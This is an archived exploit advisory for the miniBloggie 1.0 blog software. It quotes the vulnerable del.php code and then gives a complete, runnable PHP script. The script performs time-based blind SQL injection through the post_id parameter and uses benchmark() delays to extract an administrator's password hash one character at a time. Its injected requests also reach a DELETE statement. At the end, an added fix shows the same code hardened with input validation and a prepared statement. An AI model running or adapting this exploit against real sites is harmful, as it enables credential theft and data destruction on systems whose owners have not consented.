miniBloggie 1.0 (del.php) Remote Blind SQL Injection Exploit
Source: StAkeR[at]hotmail[dot]it   Author: StAkeR   Published: 2008-10-20
#!/usr/bin/php
<?php
/*
   StAkeR aka athos - StAkeR[at]hotmail[dot]it
   Date   -> 18/10/2008
   Get    -> http://www.mywebland.com/dl.php?id=2
   ------------------------------------------------------------

   File del.php

   25. if (isset($_GET['post_id'])) $post_id = $_GET['post_id'];
   26. if (isset($_GET['confirm'])) $confirm = $_GET['confirm'];
   27.
   28. if ($confirm=="") {
   29. notice("Confirmation", "Warning : Do you want to delete this post ? Yes");
   30. }
   31. elseif ($confirm=="yes") {
   32. // Data Base Connection  //
   33. dbConnect();
   34. $sql = "DELETE FROM blogdata WHERE post_id=$post_id";
   35. $query = mysql_query($sql) or die("Cannot query the database. " . mysql_error());
   36. $confirm ="";
   37. notice("Del Post", "Data Deleted");
   38. }
   39. else notice( "Delete Error, Unable to complete the task !" );
   40. ?>

   NOTE:
   $sql = "DELETE FROM blogdata WHERE post_id=$post_id";
   $post_id is not escaped, so you can execute SQL code through it.

   How to fix? Sanitize $post_id with intval() or an (int) cast (PHP functions).
*/

// Sends one GET to del.php with the injected post_id and returns the raw response.
// $host is "hostname:port"; $path is the application directory on the server.
function get($host, $path, $evil)
{
    if (!preg_match('/\w:[0-9]/i', $host)) alert();
    $inet = explode(':', $host);
    if (!$sock = fsockopen($inet[0], (int) $inet[1])) die('connection refused');

    // confirm=yes is required, otherwise del.php never reaches the DELETE query
    $data  = "GET /$path/del.php?post_id={$evil}&confirm=yes HTTP/1.1\r\n";
    $data .= "Host: {$inet[0]}\r\n";
    $data .= "User-Agent: Lynx (textmode)\r\n";
    $data .= "Connection: close\r\n\r\n";
    fputs($sock, $data);

    $html = '';
    while (!feof($sock)) {
        $html .= fgets($sock);
    }
    fclose($sock);
    return $html;
}

function alert()
{
    global $argv;
    echo "# miniBloggie 1.0 (del.php) Remote Blind SQL Injection Exploit\r\n";
    echo "# Usage: php {$argv[0]} [host:port] [path] [user_id]\r\n";
    echo "# Usage: php {$argv[0]} localhost:80 /minibloggie 1\r\n";
    die;
}

// Builds the time-based payload. "1 or (...)" keeps the WHERE clause valid; the
// subquery calls benchmark() (a long CPU delay) only when the character at
// position $colum of the stored password hash equals $char, and "#" comments
// out whatever follows in the original query.
function charme($char, $colum, $id)
{
    $sql = "1 or (select if((ascii(substring(password"
         . ",$colum,1))=$char),benchmark(200000000,char(0)),0)"
         . " from blogusername where id=$id)#";
    return urlencode($sql);
}

if ($argc < 4) alert();

// ASCII codes of the hex digits 0-9 a-f; the hash is expected to be 32 hex characters (MD5).
$hash = array(48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);
$password = '';

// MySQL substring() positions are 1-based, so walk positions 1..32.
for ($c = 1; $c <= 32; $c++) {
    $found = false;
    foreach ($hash as $char) {
        $start = time();
        get($argv[1], $argv[2], charme($char, $c, intval($argv[3])));
        $stop = time();
        // A response slower than 12 s means benchmark() ran: the guess was right.
        if ($stop - $start > 12) {
            $password .= chr($char);
            $found = true;
            break;
        }
    }
    // No guess delayed the response (network error or non-hex character): mark the position.
    if (!$found) $password .= '?';
}

if (strlen(str_replace('?', '', $password)) > 0) {
    echo "# Hash: $password\r\n";
} else {
    echo "# Exploit Failed!\r\n";
}
?>

# [2008-10-18]
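The note in the exploit header says the fix is to pass $post_id through intval(); that alone is enough to stop the injection, because the value interpolated into the query can then only be an integer. The following is an added example, not code from miniBloggie or from the exploit author, showing a hardened replacement for the quoted del.php fragment: a strict numeric check on the input, and the DELETE rewritten as a prepared statement so the id is bound as a parameter instead of being pasted into the SQL text. It assumes the application's notice() helper exists as in the original and that dbConnect() can be made to return a mysqli handle (in the original it is called only for its side effect).

```php
<?php
// Added example (not part of miniBloggie): hardened version of del.php lines 25-40.
// Assumes notice($title, $text) from the application and a dbConnect() that
// returns a mysqli connection.

// Accept only a plain positive decimal integer; anything else (including the
// "1 or (select ...)" payload used by the exploit) is rejected before any SQL is built.
function validPostId(string $raw): ?int
{
    if (!preg_match('/^[1-9][0-9]{0,9}$/', $raw)) {
        return null;
    }
    return (int) $raw;
}

$post_id = validPostId($_GET['post_id'] ?? '');
$confirm = $_GET['confirm'] ?? '';

if ($post_id === null) {
    notice("Delete Error", "Invalid post id");
    exit;
}

if ($confirm === "") {
    notice("Confirmation", "Warning : Do you want to delete this post ? Yes");
} elseif ($confirm === "yes") {
    $db = dbConnect();   // assumed to return a mysqli handle

    // The id never touches the query string: it is bound as an integer parameter,
    // so even a non-numeric value could not alter the statement's structure.
    $stmt = $db->prepare("DELETE FROM blogdata WHERE post_id = ?");
    if ($stmt === false) {
        die("Cannot query the database. " . $db->error);
    }
    $stmt->bind_param("i", $post_id);
    if (!$stmt->execute()) {
        die("Cannot query the database. " . $stmt->error);
    }
    $stmt->close();

    notice("Del Post", "Data Deleted");
} else {
    notice("Delete Error, Unable to complete the task !");
}
?>
```

Either layer on its own (input validation or the bound parameter) removes the injection; using both means a later change to one of them does not silently reopen it. The benchmark()-based timing payload in the exploit depends on the value reaching the query unchanged, so with this code the request is rejected at validPostId() and never reaches the database.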

 
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved